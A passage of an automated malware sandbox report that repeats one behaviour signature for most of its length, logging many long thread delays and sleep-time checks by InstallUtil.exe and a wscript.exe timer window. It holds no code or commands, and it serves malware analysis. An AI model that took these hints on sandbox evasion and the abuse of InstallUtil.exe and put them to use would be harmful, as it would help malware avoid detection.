                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595736Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595596Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595463Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595341Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595164Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593860Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2933Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 6873Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1934Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7885Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep count: 39 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6792Thread sleep count: 2933 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -599844s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6792Thread sleep count: 6873 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -599719s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep count: 33 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -599594s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -599485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -599360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -599235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -599110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -598985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -598860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -598735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -598610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -598485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -598360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -598235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -598110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -597110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596970s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596846s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596719s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -596110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595454s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595329s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595204s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -595079s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594953s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594842s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594730s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594623s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594458s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594329s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594204s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -594059s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -593890s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -593781s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -593671s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6768Thread sleep time: -593555s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep count: 34 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5940Thread sleep count: 1934 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599891s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5940Thread sleep count: 7885 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599780s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599672s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599563s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599438s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599313s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599203s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -599094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598969s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -598110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -597110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596235s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -596110s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595736s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595596s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595463s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595341s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595164s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -595031s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594922s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594813s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594688s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594563s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594438s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594328s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594219s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -594094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -593985s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5528Thread sleep time: -593860s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596970Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596846Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594953Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594842Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594730Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594623Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594458Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594059Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593890Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593671Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593555Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599780Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
